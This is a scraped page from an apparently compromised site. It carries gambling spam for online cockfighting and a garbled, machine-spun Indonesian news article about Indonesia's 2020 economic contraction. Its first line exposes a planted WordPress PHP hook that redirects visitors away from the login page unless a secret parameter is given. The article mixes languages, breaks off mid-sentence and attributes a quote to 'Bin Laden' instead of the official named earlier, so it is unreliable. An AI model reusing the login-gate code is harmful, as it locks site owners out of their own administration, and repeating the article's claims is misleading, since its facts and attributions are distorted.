//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Komite Manajemen Covid-19 tidak terkejut dengan ekonomi negatif lebih dari 5% | download game adu ayam_s128live_situs sabung ayam online

Komite Manajemen Covid-19 tidak terkejut dengan ekonomi negatif lebih dari 5%

Laporan reporter Tribunnews.com Yanuar Riezqi Yovanda

Jakarta, TRIBUNNEWS.COM-Covid-19 Management and National Economic Recovery Committee (PEN) Sekretaris Eksekutif I Raden Pardede mengaku tak terlalu penting bagi perekonomian Indonesia. Terkejut adalah negatif 5%, atau tepatnya 5,32. Persentase triwulan II 2020. Menurut dia, perekonomian sudah menunjukkan tanda-tanda menyusut sejak April atau diberlakukannya pembatasan sosial skala besar (PSBB). Bacaan: minus pertumbuhan ekonomi, Menteri Keuangan: Indonesia Belum pernah mengalami resesi-baca: Jerman memasuki resesi setelah dua triwulan berturut-turut pertumbuhan ekonomi- “Pertama-tama, kami tidak heran karena bisa melihat berbagai data masa lalu yang kami sebut indikator awal. Ini Menandakan aktivitas ekonomi sudah menurun sejak April, “ujarnya dalam conference call, Senin (8 Agustus 2020). Raden menjelaskan, sebenarnya terjadi penurunan di bulan Maret, dan puncak perekonomian turun antara April 2020 dan Mei 2020.

“April dan Mei sangat intens. Karena seca”, pemerintah sengaja menasihatinya untuk mengatakan: “Bekerja dari rumah dan menasihati agar tidak bepergian keluar-masuk kota.” -Meski begitu, dia menambahkan bahwa meskipun kenyataan tidak bisa dihindari , Namun pemerintah tidak mengharapkan pertumbuhan ekonomi yang negatif.

“Oleh karena itu, data yang dikeluarkan Badan Pusat Statistik (BPS) tidak mengherankan. Meski tidak diharapkan, kami juga mencoba membandingkannya dengan negara-negara krisis lainnya. Misalnya China negatif 6,5% pada kuartal pertama. , Indonesia tidak negatif, kami masih tumbuh 2,97%, ”kata Bin Laden.

Leave a Comment

download game adu ayam_s128live_situs sabung ayam online